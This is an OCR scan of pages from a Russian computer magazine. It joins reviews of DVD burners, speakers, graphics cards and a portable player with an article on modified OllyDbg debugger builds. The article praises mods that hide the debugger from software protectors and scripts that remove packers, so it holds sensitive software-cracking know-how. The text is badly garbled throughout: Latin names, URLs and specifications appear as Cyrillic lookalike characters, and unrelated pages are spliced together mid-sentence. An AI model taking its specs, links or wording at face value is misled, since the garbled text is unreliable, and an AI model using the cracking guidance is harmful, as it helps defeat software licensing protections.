тях: устройство работает со всеми оптическими дисками С0/0\Ю, включая 
0\Ю-РАМ. Также поддерживается технология нанесения рисунка на дисках 
Юід Ы:5сгіЬе. Как было заявлено, резак пишет болванки на скорости 20х. На 
графике ты можешь наблюдать скачки скорости, а как это отразилось на 
качестве записи, можно оценить на графике чтения. На прожиг затрачено 
4 минуты 47 секунд. При чтении ранее записанного на этом приводе диска 
были заметны скачки скорости к концу передачи данных. Заявленная ско- 
рость была достигнута с учетом погрешностей, а на копирование диска ушло 
почти 5 минут. Надо сказать, что привод проявил себя не с лучшей стороны 
в плане шума. Вибрации невелики и будут гаситься корпусом при правиль- 
ном монтаже устройства, но шум раскрученного диска способен заглушить 
слабый звук из динамиков. С учетом всех преимуществ и недостатков можно 
рекомендовать привод владел ьцам ем кихжестких дисков (по соображениям 
шумности ОѴй-фильм будет лучше скопировать, а не смотреть напрямую с 
диска) и обладателям свободного разъема ЮЕ. 



Признанный производитель акустики и аудиоаппаратуры занимается также 
выпуском пишущих оптических приводов для твоего компьютера. Одна изта- 
ких моделей попала в нашу тестовую лабораторию и сейчас мы разберемся, 
что же она умеет. Резак способен работать с дисками Сй и ОѴЮ — как на за- 
пись, таки на воспроизведение. Причем, записыватьон можетвсетипы дис- 
ков ОѴЮ, включая двухслойные болванки и 0Ѵ0-РАМ. При этом запись нам 
обещают на уровне 20х для однослойных дисков — нынешний максимум для 
всех приводов. К сожалению, отсутствует поддержка рисования на дисках, 
известная, как ЕідЫЗсгіЬе — придется подписывать диски, как и прежде. 
Резак подключается по шине 5АТА; провода узкие, ошибиться с подключе- 
нием невозможно и монтаж не займет много времени. Запись диска выявила 
несколько нюансов. Во-первых, приводдостаточно шумный, ноэтим отлича- 
ются все скоростные модели — за скорость приходится платить. Во-вторых, 
посмотрев на график записи, ты отчетливо увидишь «гребенку» (в идеале 
кривая записи должна быть без скачков). Диск записан за 4 минуты 46 секунд 
и максимальная скорость даже немного превысила заявленные 20х. Этотже 
дискбыл прочитан за 4 минуты 59 секунд — совсем небольшая разница меж- 
ду временем записи и чтения. Заявленная скорость чтения в 16Х была до- 
стигнута. Если обратишь внимание на график, то увидишь небольшие скачки 
скорости — это может свидетельствовать о чувствительности к качеству за- 
писи. Вероятно, поцарапанные диски будут читаться не столь быстро. 
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Технические характеристики: 

Интерфейс: ІОЕ 
Объем буфера: 2 Мб 

Поддерживаемые форматы чтения | СО-В/КѴѴ/ОѴВ+Р/-К/+КѴѴ/-К 017+К 



ои-кѵѵ/р дм 

Поддерживаемые форматы записи 

РІ-/-КѴѴ/ВАМ 



К 



Скорости чтения СВ/ОѴІЭ: 48Х/16Х 
П одде ржка "У д МзсгІ Ье | нет 



к, СР-КѴѴ32Х, РѴО+К 18 Х, РУР+В Е 



8х, йѴй-В 1 8х, РѴР-В иі 8х, ОѴР-ВѴѴ 6х, РУР-ВАМ 12х. 



О о 



Компания РБЕХТОВ действует на рынке оптических приводов уже до- 
вольно давно и может похвастаться «звездными» моделями. Сегодня 
на суд общественности представлена модель с интерфейсом ШЕ — не 
будем говорить о старомодности, ведь о целесообразности интерфейса 
5АТА у оптических приводов еще можно поспорить. Посмотрим, что же 
предлагает нам свежий «резак». Скорость чтения йѴй на уровне 1 6х, а 
ОѴО-РАМ — 1 2х. Запись однослойных 0Ѵ0+/-Н порядка 1 8х — не рекорд, 
да и все остальныетипы дисковтакже записываются несколько медлен- 
нее, чем у конкурентов. Впрочем, попробуем тесты. Диск был прожжен 
забсполовиной минут. Не больно-то быстро — к тому же, график записи 
пестрит скачками. А вот график чтения порадовал практически идеаль- 
ной кривой. Скопировать дискты сможешь ровно за 5 минут. И есть боль- 
шая вероятность, что привод с успехом будет читать старые и поцара- 
панные болванки, а это многого стоит. Несмотря на распространенность 
технологии ЫдбЗспЬе, специальные диски с дополнительным слоем не 
пользуются большой популярностьюу пользователей — вероятно, имен- 
но поэтому производитель не стал встраивать поддержку этой техно- 
логии. Малый уровень шума, незначительные вибрации и практически 
полное отсутствие нагрева — такими качествами может похвастаться 
РБЕХТОР РХ-800А. Помирившись с несколько увеличенным временем 
записи (относительно остальных «резаков»), ты получишь добротный 
девайс — крепкую рабочую лошадку. 




700 руб. 



Т55Тсогр 5Н-52030 



Технические характеристики: 

Интерфейс: 5АТА 
Объем буфера: 2 Мб 

Поддерживаемые форматы чтения: С й- К/РѴѴ/РѴО+ Р/- В/+КѴѴ/- ВѴѴ/КАМ 
Поддерживаемые форматы записи: СР-Р /РѴѴ/РѴР+Р /-Р/* РѴѴ/-РѴУ/Р АМ 
Скорости чтения СО/ОѴО: 48Х/16Х 
ЩбддеЩйа.'НШ@Ш11! : ні| 

Скорости записи: С0-Р48Х, СР-ВѴУ 32х, РѴР +Р20Х, РѴР+В РІІбх , 
РѴР+ВѴѴ 8х, РѴР-Р 20х, РѴР-Р РІ_ 12х р РѴР-РѴѴ 6х, РѴР-РАМ 12х. 

•••••••••О 



Привод, произведенный усилиями компаний ТозЫЬа и Затзипд, обла- 
дает неплохими заявленными техническими характеристиками. Под- 
ключается девайс по шине 5АТА: меньше проводов — лучше вентиля- 
ция в системном блоке. На старых материнских платах могут возникнуть 
проблемы с опознаванием устройства — но для их решения достаточно 
обновить на ней прошивку. Двух мегабайт буфера при прочих нормаль- 
ныхусловиях будет вполне достаточно для эффективной работы. Скоро- 
сти чтения СИ и ОѴО-дисков, соответственно, 48Х и 16Х — но помни, что 
максимум передачи данных достигается на внешней стороне дорожки, 
то есть к концу данных на болванке. Привод не поддерживает нанесение 
рисунков на болванки, но неплохо справляется с записью. При тесто- 
вом прожиге чистого диска максимальная скорость была установлена 
на уровне 18,05х (немного не дотянуло до заявленных 20х]. Были за- 
метны и скачки скорости при записи. Время, затраченное на прожиг, 
составило 5 минут 1 6 секунд. Что касается чтения, то записанный диск 
был прочитан на максимальной скорости 16,25х, за 4 минуты 56 секунд. 
Чтение записанного диска прошло без ошибок, что свидетельствует о 
хорошем качестве записи. Подумай только — ты можешь скопировать 
фильм с ОѴО на компьютер менее чем за 5 минут. Приятно, что привод 
работает с болванками всех типов, включая БУО-РАМ. И хотя эти диски 
по-прежнему отличаются высокой ценой и не имеют большого распро- 
странения, их можно встретить при использовании бытовых йѴО-плее- 
ров или цифровых видеокамер. Привод работал относительно тихо, но 
при максимальных оборотах шпинделя двигателя звук выделялся из об- 
щего шума компьютера. За время работы с диском девайс практически 
не нагрелся. 



г ВЫВОДЫ 

Записав очередную пачку дисков, мы поняли, насколько ценно время, 
которое почти в буквальном смысле прожигается в ожидании оконча- 
ния работы оптического привода. Также мы столкнулись с проблемой 
шумового загрязнения окружающей среды — практически все приво- 
ды при максимальных оборотах раздражали изрядным гулом. Но зато 



порадовали временем записи и чтения. Итак, раздаем призы. «Вы- 
бором редакции» признан І_6 6Н20Ы51 0 — за сочетание скоростных 
и технических возможностей. «Лучшая покупка» достается «резаку» 
ТЗЗТсогр 5Н-5203О, который весьма неплохо справился с работой. И 
кстати, присмотрись к ценам — они существенно снизились, потому 
что на подходе ВІиРауІцс 
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4 девайса 




Сгеаііѵе Тгаѵеізоипсі 

2ЕЮ 8іопе 
Неплохой аксессуар 
для обладателей плеера 
СгеаЛѵе 2ЕЫ 5Шпе 




М8І Ш8006ТХ-Т2Б512 

Топовая видеокарта на 
базе мощнейшего чипа от 
КГѴГОІА с заводским разго- 
ном 



11500 руб. 



Технические характеристики: 

Тип устройства: Внешние колонки для плеера Сгеаііѵе 2 ЕЫ Біопе 
Мощность: 0.2 Вт на канал (КМ 5 ) 

Частотный диапазон: 200 Гц — 20000 Гц 

Соотношение сигнал/шум: 75 дБ 

Питание: внешние батареи класса ААА(2 штуки) 

Вес: ібо грамм 




1. Внешняя акустическая гарнитура Сгеабѵе Тгаѵеізоипсі 2ЕЫ Біопе с 
батарейками весит всего 200 грамм. Используются обычные ААА-источ- 
ники в количестве двух штук. Колонок всего две. В продолговатый пенал 
вставляется плеер — в отверстие ровно посередине помещается сам 
проигрыватель. 

2 . Колонки для соединения с плеером используютобыкновенный «джек 
3.5». Некоторые проигрыватели не из линейки Сгеабѵе также могут быть 
использованы (они просто совпали по размерам сячейкой под2ЕЫ Біопе). 

В частности, подошли Ігіѵег Е1 00 (как влитой) и Арріе і Рос) Ыапо (с некоторы- 
ми нюансами). 

3. Качество звучания — неплохое и сравнимо с ноутбучными колонками 
среднего уровня. Мощность — 0.2 Втна канал. Преимущественно воспроиз- 
водятся средние частоты, хотя, по сравнению с наушниками, низкиетакже 
звучат неплохо. 

Ѳ 

1. Некоторые плееры подключить кустройству, естественно, не пред- 
ставляется возможным. Непонятно, почему производитель не пожелал 
положить в комплект гибкий провод или другой переходник для сторонних 
устройств. 

2 . Регулировки настроек на колонках не предусмотрено. Есть только клави- 
ша для включения и выключения. Таким образом, придется все калибро- 
вать с помощью самого проигрывателя. 

3. Уровень громкости — высокий. Однако его недостаточно для прослуши- 
вания на шумной улице идем более, в метро. Ничего не будет слышно, так 
что рекомендуется пользоваться классической гарнитурой. 



Техническиехарактеристики: 

Графический чип: 692 
Потоковые процессоры: 128 
Частота чипа: 720 МГц 
Объем памяти: 512 Мб СРОКз 
Частота памяти: 2.2 ГГц 
Шина памяти: 256 бит 

Поддерживаемые технологии: ОігесО(10.1,5Ііас1ег МогіеІ 4 , РСІ Ехргезз 
2 . 0 ,Тпрр 1 е 51_1 

Техпроцесс: 65 нм 




1 . Новинку характеризует высокий уровень производительности, отличный 
разгонный потенциал, поддержка НОМІ и модифицированнойтехнологии БЫ. 

2 . Система охлаждения представленного плана уже использовалась в 
видеокартах МѴЮІА6еРогсе88006ТБ. Во время тестирования температура 
чипа достигла 72 градусов по шкале Цельсия во время 30-нагрузки — и 59 
градусов в режиме покоя. 

3. Видеопамять набрана восемью схемами производства Баптзипд с вре- 
менем отклика 0.8 нс, что соответствует частоте работы 2400 МГц. Вдобавок 
производительустановил эффективную рабочую частоту чуть меньше номи- 
нала — 2200 МГц. Потрадиции память установлена на лицевой стороне 
текстолита. 

0 

1. Драйверы требуют доработки — наблюдается неудовлетворительная 
работа устройства в некоторых режимах, в частности при парной работе в 
БЫ двух идентичных устройств. 

2 . Цена слишком высока — такую плату может позволить себе не каждый. 

Да и от решений прошлой линейки по производительности М5І Ы98006ТХ- 
Т20512 недалеко ушла. 

3. Комплектация оставляет желать лучшего. В наборе только необходимые 
переходники и диске драйверами. Если уж сподобились разгонять геймерс- 
кую плату, так и могли бы положить какую-нибудь нестарую игрушку в набор. 
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НІ5 Кайеоп НО 3870 

Ісе<23 

Видеокарта для фанатов 
компьютерных игр и 
любителей разгона 



Технические характеристики: 

Графический чип: РѴ670ХТ 
Потоковые процессоры: 320 
Частота чипа: 850 МГц 
Объем памяти: 512 Мб С00В4 
Частота памяти: 2.38 ГГц 
Шина памяти: 256 бит 

Поддерживаемые технологии: ОігесіХю.І.БІіасІег МобеІ4, 
РСІЕхрГѲ55 2.0 




1. Новинку от многочисленных аналогов отличают сильно увеличенные 
частоты, оригинальная система охлаждения и поддержка НРМГразъема. 

2. Плата поставляется в небольшой коробке черного цвета. В комплекта- 
цию, помимо самого устройства, входит: необходимый набор переходников, 
диске ПО, атакже многофункциональная отвертка со сменными насадками 
и фонариком. 

3. Система охлаждения представляетсобой комбинацию радиаторной 
части из медного сплава и нагнетателя с крупными лопастями. Похожий 
агрегатмы могли видетьна ранних решениях от НІ5. Система ІсеОЗуже не 
раз применялась в модифицированных акселераторах и прекрасно себя 
зарекомендовала. 

4. Плата собрана на текстолите синего цвета и использует чип, изготов- 
ленный сучетом 55-нм техпроцесса, а именно — РѴ670. Отметим совмес- 
тимость с графической шиной РСІ Ехргезз 2.0, способность работать в 
конфигурации следующего поколения СгозвРігеХ и поддержку технологии 
энергосбережения АТІ РоѵѵегРІау. 

5. Производитель установил на плату память формата 600Р4, которая ра- 
ботает на частоте 2.38 ГГц. Память собрана на восьми схемах производства 
Затзипд. Общий объем памяти равен 51 2 Мб. Шина обмена составляет256 
бит. Что касается самого чипа, то его частота была увеличена до 850 МГц. 

0 

1 . Не слишком высокий уровень производительности по сравнению с ана- 
логами от ІМѴЮІА. Достаточно шумная система охлаждения. 



ТЕ5Т_І.АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ 
НАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕДСТА- 
ВИТЕЛЬСТВАМ КОМПАНИЙ НІ5, СКЕАТІѴЕ, М5І И ВВК 




ВВКБЬ3768І 
Отличный мобильный 
проигрыватель, кото- 
рый понравится всем 



5990 руб. 

I _ . '4ЯГ 



Технические характеристики: 

Функции: Видеоплеер, аудиоплеер, телевизор, фотоальбом 
Поддерживаемые форматы: СР-РА, НРСР, МРЗ.ММА, йіѵХ, ОѴй, МРЕ64, 
5ѴС0,ѴС0,ХѵЮ^РЕ6 
Дисплей: 7". ТРТ 1б:9 

Поддерживаемые носители: Сй, 0Ѵ0,50, ММС, МетогуЗІіск 
Звук: 2 стерео-динамика, 20-20000 Гц 
Батарея: Съемная, І_і-Іоп Роіутег 
Размеры: 224x163x44-5 мм 
Вес: 814г 




1. В комплекте поставляется пультдистанционного управления, блок 
питания, съемная батарея, а также сумка для транспортировки. Устройство 
— легкое и удобное. Напоминает компактный ноутбук. 

2. Экранная часть может принимать любые положения по горизонтальной 
оси. Сама осьтакже может смещаться. В результате, кино можно смотреть, 
как на ноутбуке, или свернуть, как планшет, — все зависит оттвоих пред- 
почтений. Батареи хватает часов на пять (если смотреть фильмы на йУй без 
перерыва). 

3. Устройство снабжено портом 115В и картридером — так что фильмы мож- 
но смотреть и с флеш-носителей. В меню необходимо выбрать нужный но- 
ситель, а в браузере указать необходимый файл. Плеер выполнит процесс 
перекодировки и начнет воспроизведение. Проблем, зависаний, скачков 
кадра замечено не было. 

0 

1. Нынче появилось большое количество мобильных проигрывателей, 
которые помещаются в одной руке. По сравнению с ними, этот, возможно, 
великоват. 

2. Мощность динамиков оставляет желать лучшего. Фактически, прихо- 
дится смотреть кино на полной громкости. Если рядом с плеером окажется 
серьезный источник шума, то звука вообще не будет слышно. 

3. Система управления не отличается удобством, особенно если речь идет 
об управлении посредством встроенного браузера (например, когда требу- 
ется смотреть фильм с флешки или карты памяти). 
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г ОТКУДА БЕРУТСЯ МОДИФИКАЦИИ 

Отладчик ОІІу ОеЬиддегпредставляетсобой закрытый программный 
продукт, распространяемый бесплатно, но без исходных текстов и права 
модификации двоичных файлов. Однако возможность подключения пла- 
гинов, использования скриптов и ухищрения умельцев, которые, несмотря 
на запреты, все-таки дизассемблируют и модифицируют код любимого 
отладчика, привели кпоявлению огромного числа модифицикаций. 

На официальном сайте ѵѵѵѵѵѵ.оЦѵсІЬд.сІе в настоящий момент доступна для 
скачивания устаревшая версия 1.08Ь, самая популярная — 1.10 и недоде- 
ланная 2.хха1рЬа, находящая в активной разработке. Последняя версия се- 
рьезно уступает по функционалу предыдущей, зато ее «движок» полностью 
переписан, что в перспективе сулитбогатые возможности. 

Подавляющее большинство модов базируются именно на 1 .10 версии. Не- 
которые (очень немногие) — на 1 .08 и еще меньше — на 2.хх. В самом деле, 
какой смысл править бинарный файл, если с выходом очередной альфы (а 
выходятони чутьли не каждую неделю), процесс создания мода необхо- 
димо начинать заново — переносить изменения из одной версии в другую 
приходится вручную, автоматика отдыхает. Эх, вот были бы исходные 



тексты... Но, увы! Их нети, по всей видимости, не будет. 

Плагины и скрипты, написанные для 1.10, исправно работают в боль- 
шинстве модов, однако без каких бы то ни было гарантий, особенно если 
создатели мода захачили его не по-детски. Хотя в таких случаях они, как 
правило, тестируют популярные плагины на совместимость, при необходи- 
мости внося изменения и закидывая пофиксенный плагин в дистрибутив, 
распространяемый вместе с модом. А вот при выходе следующей версии 
мода в дистрибутиве обычно оказывается лишь сам исполняемый файл. 
Подобный дистрибутив имеет подозрительно малый размер (метр и менее). 
Поэтому процедура установки выглядит так: находим базовую версию мода 
(занимающую самый большой размер), качаем, распаковываем архив, 
ставим. Находим самую последнюю версию, распаковываем втотже самый 
каталог. И наслаждаемся. Иногда, правда, приходится скачивать все про- 
межуточные версии, поскольку в них исправлены те или иные файлы. 
Количество одновременно используемых модов ничем не ограничено, 
просто ставим их в разные каталоги и все. Исключение составляют Эизі-Іп- 
Тіте-отладчики, вызываемые системой при крахе приложения. ЛТ-отлад- 
чик может быть только один и тут уже приходится выбирать, какой из модов 
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Уъе 

СЬес 

-оъ 



ттипііу ОеЬиддег — популярный Ольгин мод с поддержкой Питона ^ 



ШІСОВЕ РІ Уп -Весомее 



(или оригинальную Ольгу) назначать на эту должность. Каталоге плагинами 
(за исключением тех, что «заточены» под конкретный мод) также может 
быть единым для всех модов — экономия дискового пространства налицо! 
Где искать моды?Хороший вопрос... Обычно они выкладываются на фай- 
лообменники типа Рапиды, а на хакерские форумы забрасываются ссылки, 
действующие в течение некоторого времени, а затем тихо кончающиеся 
по причинеудаления файла. Какговорится: кто неуспел — тотопоздал, и 
тогда приходится искать моды на сайтах, посвященных информационной 
безопасности. Например, довольно внушительная коллекция находится на 
сервере: Ьир:/Леат-х.ги/диги-ехе/іпсІех.рЬр?раіЬ=Тоо1.5%2РРеЬиддег5% 
2Р011уРЬд/ . 

Поскольку создатели модов обычно не утруждают себя описаниями, что 
же именно было модифицировано и чем мод отличается оторигинальной 
Ольги, приходится качать много всякого барахла, оставляя на компьюте- 
ре, в среднем, один мод из десяти. Чтобы тебе не пришлось повторять эту 
операцию, мыщъх решил описать самые крутые моды, которые использует 
и рекомендует. 

г імміжітѵоЕвиббЕК 

Известный мод одноименной фирмы, специализирующейся на безопас- 
ности и скрестившей Ольгу 1.10с Питоном — интерпретируемым языком, 
на котором очень легко и быстро писать скрипты. Конечно, писать их можно 
прямо в Ольге, но это не слишком удобно, все приходится делать вручную и 
решать типовые задачи (типа поиска в памяти), которые уже давно решены. 
В Іттипііу ОеЬиддег входит множество библиотек, написанных на РуіЬоп 
и заточенных под хакерские нужды. Библиотеки вызываются из Питоновых 
программ, среди которых значится и зеагсЪсгурі .ру — отличное средство 
идентификации следующих криптографических алгоритмов: АЕ5, ВШѴѴРІ5Н, 
САМЕША, СА5Т, М05, ПС2, ПС5, КІРЕМБ1 60, 5НА1 . 5НА256, 5НА51 2. 

Іттипііу ОеЬиддег используют многие специалисты по безопасности, 
выкладывающие ргоо^-о^-сопсері ехроІіПы, написанные на Питоне и 
предназначенные для работы исключительно в среде данного отладчика. И 
хотя хакер с головой разберется в алгоритме работы ехрІоіПа и без Іттипііу 
ОеЬиддег’а, портируя ехріоіі на любой другой язык, рано или поздно отлад- 
чикоказывается на компьютере, зачастую становясь основным инструмен- 
том, вытесняющим Ольгу. 

Скачать его (после предварительной регистрации) можно прямо с офици- 
ального сайта : ѵѵѵѵѵѵ. ітти піІѵзес.сот/ргобисІіз-ігптсіЬа.зЬігпІ. . 

И УйВО 

Популярный и очень мощный мод, основанный на Ольге 1 .10 и собравший в 
своем дистрибутиве огромное количество плагинов, скриптов, а также кучу 



других полезных инструментов. В результате образовался монстр размером 
в целых 27 Мегабайт, но несомненно стоящий времени/трафика, потрачен- 
ного на скачку. 

В отличие от Іттипііу ОеЬиддег’а, ориентированного на специалистов по 
безопасности, ѴБЬд писался хакерами и для хакеров, ломающих защиты с 
протекторами (те активно сопротивляются такому положению дел и напич- 
каны анти-отладочными приемами, распознающими присутствие Ольги по 
главному окну с ее именем и пунктам меню). 

Поэтому первое, что бросается в глаза при запуске УРЬд (исполняемый 
файл которого переименован из ОЬЬУБВО . ЕХЕ в ЗЫЛ . ехе), — это «покоре- 
женные» пункты меню. В частности, «Метогу» превратилось в «МЗтОгу», 
«БЕН сЬаіп» в «53Н сЬаіп», «Вгеакроіпіз» в «ВгЗакрОІ піз» ит. д. Словом, 
все «хакерские» пункты изменены — попробуй их найти (естественно, в 
новых версиях протекторов наверняка появится детекция УОЬд, но пока он 
успешно скрывается от кучи защит, палящих Ольгу). 

Вид кнопочек на панели инструментов изменен на ХР-стиль — скорее, 
вопрос вкуса, чем насущная необходимость. 

В состав дистрибутива УйЬд входитЗб популярных плагинов (и не нужно 
теперь рыскать по Сети в их поисках). Среди них затесался настоящий 
бриллиант — ЮАБідз, название которого говорит само за себя. Да -да! 
Это плагин, поддерживающий ЮА-сигнатуры и отображающий их в 
виде комментариев к вызываемым функциям в Ольге или в УОЬд. Очень 
удобно! Конечно, при наличии ЮА-Рго можно загрузить исследуемую 
программу в нее, сохранить все распознанные имена в тар, подключа- 
емый к Ольге тоже не без помощи плагинов. Но ЮА-Рго есть далеко не у 
всех, да и муторно совершать столько лишнихтелодвижений. Если файл 
упакован, то в ОльгеЛЮЬд мы просто распаковываем его специальным 
скриптом или аттачимся куже запущенному процессу (ЮА-Рго в этом 
случае отдыхает). 

Сигнатуры (выдернутые из ЮА-Рго) также входят в состав дистрибутива в 
комплекте с сигнатурами от различных защит (например, РБЕХІт), которых 
в ЮА-Рго нет. Единственный недостаток — в плагине отсутствует автомати- 
ческий распознаватель сигнатур и потому версию компилятора приходится 
определять либо с помощью РЕЮ, либо последовательно перебирая 
различные сигнатурные базы одну за другой, пока, наконец, не найдется та, 
что подходит. Нетакая уж большая проблема, но все-таки... 

Другой полезный плагин — гесІ-Ьаѵѵк («красный ястреб») пред- 
ставляет собой панельку инструментов, позволяющую, в частнос- 
ти, одним движением мыши установить точки останова на нужные 

функции (например, в Ѵізиаі Вазіс’е это что-то типа ѵЪаЗІгСтр или 

ѵЪаЗІгСору, используемые для сравнения и копирования строк, 

соответственно). Начинающие хакеры просто визжат от восторга, 
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'Внешний видлокализованного мода Ольги 
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> СІѴСІ 

Лучшие модифика- 
ции ОІІуРЬд, а также 
оригинальный дис- 
трибутив отладчика 
ты найдешь на нашем 
диске. 



Внешний вид ѴРЬд — еще одного популярного хакерского мода Ольги 



мои 

мок 
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Ш 10 Н 
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Материал представ- 
лен исключительно в 
целях ознакомления. 

В случае применения 
в незаконных целях 
редакция и автор 
статьи ответственнос- 
ти не несут. Не делай 
глупостей! 



поскольку красный ястреб фактически является учеб- 
ником по взлому, а так попробуй догадаться, что нужно 
делать! 

К сожалению, три плагина не работают и подлежат удале- 
нию. РипіозМадісоз .611 при запуске ѴРЬд выбрасывает 
исключение, ведущее к краху. ЗЫЛ Зсгіріі . 611 вызывает 
динамическую библиотекуМ5УСР80 . 611, отсутствующую 
в дистрибутиве моей любимой ѴѴ2К, аАРІНЬР . 611 зовет 
МРС71 . РЬЬ, которой у меня также нет. Вообще-то, правила 
хорошего тона предписывают класть такие вещи в дистри- 
бутив, чтобы не напрягать пользователя поисками (а искать 
в первую очередь нужно на сайте Місгозоіі, так как они 
относятся ксвободно распространяемым компонентам). 
Каталог \ЗСРІРТ содержит 637 скриптов, главным образом 
предназначенных для снятия различных протекторов/упа- 
ковщиков исполняемых файлов и автоматизации всяких 
рутинных дел. Впечатляющая коллекция! И неплохое посо- 
бие для начинающих на тему «как нужно писать скрипты». 
Вдобавок имеется парочка специализированных редакто- 
ров, предназначенных для разработки скриптов (один из 
которых требует . N ЕТ) . Опять-таки, вопрос вкуса. Мыщъх 
предпочитает писать скрипты в РАР'е с Соіогег’ом, но своих 
предпочтений никому не навязывает. Пусть каждый решает 
сам. 

Каталог \ВТіѴнасчитываетсвыше сотни мелкихутилит, 
преимущественно надерганных из М5 5РК, хотя немало здесь 



дамперов памяти и других хакерских программ, собранных 
в одном месте и в совокупности занимающих 1 1 метров в 
неупакованном виде. 

На этом достоинства ѴРЬд заканчиваются. В принципе, это 
не столько мод, сколько коллекция плагинов, скриптов и 
сигнатур. У кого быстрый модем и дешевый интернет — почему 
бы и не скачать? ЬіІрѴ/іеат-х.ги/диги-ехе/ГооІз/РеЬиддегз/ 
ОЦуРЬа/0[[ѵРЬа%20ѵ1.Ю%20УРЬа%20Веіа.72 . Слово «Ьеіа» в 
адресе навевает не очень-то приятные ассоциации (щас все 
упадет, заглючит), однако, у меня все работает и... пока полет 
нормальный. 



МОЙ 

МОН 

МОЙ 

МОК 



Баг в Іттипііу 
ВеЪи§§ег'е 



Іттипііу БеЬи^ег содержит один мелкий, но очень неприятный баг. Если 
удалить интерпретатор РуіЬоп с компьютера (или же перенести его в другой 
каталог) без выполнения процедуры деинсталяции, то Іттипііу РеЪи§§ег (по 
оставшимся записям в реестре) будет считать, что Питон у нас есть и . . . грохаться 
при запуске, выдавая одну критическую ошибку задругой, на поиск источника 
которых можно угробить кучу времени. Переустановка Іттипііу РеЬи^ег’а не 
помогает, так как инсталлятор смотрит в реестр и видит, что Питон у нас есть, а 
потому и не ставит его, заставляя Іттипііу РеЪи^ег снова грохаться при первом 
же запуске. Проблема решается удалением Питона через Панель Управления/ 
Установка и Удаление Программ с последующей переустановкой Іттипііу 
РеЪи§§ег’а. 



в моды интерфейса 

Английский, конечно, «обще-хакерский международ- 
ный» и без него много не нахачишь. Но особенности на- 
циональных реалий таковы, что толпа народу с инглишем 
исключительно на «вы». Русификация процветает. Лично 
мыщъх встречает локализованные программы в штыки. В 
частности, на диске, прилагаемом к материнской плате, 
что мне «посчастливилось» купить, лежала локализо- 
ванная версия Ыего Ехргезз, в которой «громкость» 
(«ѵоішпе») переведена как«том». Пример яркий, но не 
единственный. Локализация — своеобразная интеллек- 
туальная игра из разряда «как, черт побери, это звучало 
в оригинале?!». Мануалы в своей массе используют ори- 
гинальные программы, что сильно напрягает владельцев 
русифицированных версий при их чтении. Попробуй с 
ходу разберись, в какой пункт нырять, особенно если 
отсутствует скрин. Ладно, все это лирика. Нужен лока- 
лизованный мод Ольги, берем, качаем: Ыір://іеат-х.ги/ 
диги-ехе/ТооІ5/РеЬиддег5/011уРЬд/ОІІуРЬд%20ѵ1 . 1 0 % 2 О 



Риззіап.гаг 



Мыщъх любит сыр и консоль, а вотХР не переваривает. 
Органически. Клава рулит. Тыкать курсом в иноки — это 
вообще не по-хакерски. Впрочем, какуже говорилось, о 
вкусах не спорят и если кто-то сидит под ХР (а сидят под 
ней многие) и хочет, чтобы Ольга была такой же красивой 
с пурпурными пуговицами, то... почему бы и нет? Можно 
использовать либо УРЬд (он как раз в таком стиле и сде- 
лан), либо более легковесный мод, не делающий ничего, 
кроме смены стиля и потому в упакованном виде весящий 
меньше, чем мегабайт: ЫірѴ/іеат-х.ги/диги-ехе/ТооІз/ 
РеЬиддегз/ОІІуРЬд/ОІ[уРЬд%20ѵ1 .10%20ХР.гаг 
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Хитрый поиск 
глючного плагина 



При последовательной установке плагинов никаких проблем не воз- 
никает. Если свежеустановленный плагин приводит к краху Ольги 
(или мода), то просто удаляем его и все! 

Однако при пакетной установке плагинов или запуске мода с кучей 
предустановленных плагинов коварная Ольга не сообщает имя пла- 
гина, который она в данный момент грузит. Остается только гадать, 
кто из них гадит. Классическое решение проблемы — последователь- 
ное перемещение плагинов в другой каталог. Как только исключе- 
ние исчезло — последний перемещенный плагин и есть виновник. 
Но при большом количестве плагинов операция поиска отнимает 
слишком много времени и возникает желание ее оптимизировать. 
ОК, перемещаем половину плагинов и смотрим результат. Если 
исключение исчезло, значит, глючный плагин находится в первой 
половине, если же нет — то во второй. Найденную половину вновь 
делим на две части и повторяем эту операцию до тех пор, пока делить 
будет нечего. 

Но и это не предел! Поскольку, плагины грузятся последовательно, 
а исключение, как правило, возникает в процедуре их инициали- 
зации, то в большинстве случаев достаточно удалить /переместить 
последний загруженный плагин. Операционная система автома- 
тически обновляет дату/время последнего обращения к файлу, 
просмотреть которую в РАК’е можно по < СТКЬ-А> . Отсортировать 
плагины в порядке убывания/возрастания времени последнего 
обращения — по < СТКЬ-Р9 > . Просто скользим по списку файлов 
вниз (или же распахиваем панель на весь экран в детализированном 
режиме) и видим, что сначала идут плагины с одинаковым време- 
нем последнего обращения, а потом наступает «разрыв», равный 
промежутку между двумя последними запусками Ольги. Тот плагин, 
что стоит на границе разрыва — с высокой степенью вероятности 
и окажется сбойным. Удаляем/перемещаем его и перезапускаем 
Ольгу/мод. 

Впрочем, подобная техника срабатывает далеко не всегда. Случается 
конфликт нескольких плагинов сразу (иногда трех и более) . Неко- 
торые плагины, загружаемые первыми, не вызывают исключения, 
зато «обламывают» кучу других аддонов, грузящихся после. В 
результате мы удаляем большое количество ни в чем не повинных 
плагинов, лишаясь значительной части функционала. 

В общем, плагины — дело тонкое. И подбирать их нужно аккуратно, 
как бриллианты в корону, чего, к сожалению, разработчики боль- 
шинства модов не делают, даже не утруждая себя тестированием 
образовавшейся коллекции. 
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Реакция Іттипйу ОеЬиддег’а на удаление/перемещение каталога с 
Питоном 



В ДРУГИЕ СБОРКИ 

Мы рассмотрели только четыре мода из трех десятков выложенных на 
Іеат-х. Что делают остальные? Яеабте, традиционно приложенный к 
архиву, позаимствован у оригинала и скопирован без изменений. Далее, 
И1е_ісі. (іі 2 (в тех редких случаях, когда он есть] обычно просто говорит, 
что это мод Ольги, но не конкретизирует, что именно модифицировано. По- 
этому имя архива — практически единственная информация, имеющаяся в 
нашем распоряжении. 

Возьмем, например, ОІІѵРЬд ѵі.10 ЕхеСгѵріог [ ЬНрѴАеат-х.ги/диги-ехе/ 
Тоо[5/РеЬиааег5/011ѵРЬа/ОЦуРЬа%20ѵ1 .10%20ЕхеСгѵрІог.гаг ]. Как нетрудно 
догадаться, он предназначен для сокрытия Ольги от протектора ЕхеСгурІюг, 
а распаковав архив, мы обнаружим набор плагинов, скриптов и прочих 
полезностей, существенно упрощающих взлом запротекченных программ. 
Или, скажем, ОНуРЬд ѴІ.09ІПІ йэгТМетісІа [ШрУЛеат-х.т/диги-ехе/ 
Тоо[5/РеЬиддег5/0[[уРЬд/0[[уРЬд%20ѵ1 .0%209іп1%20іог%20Тбетіс1а.гаг 1 
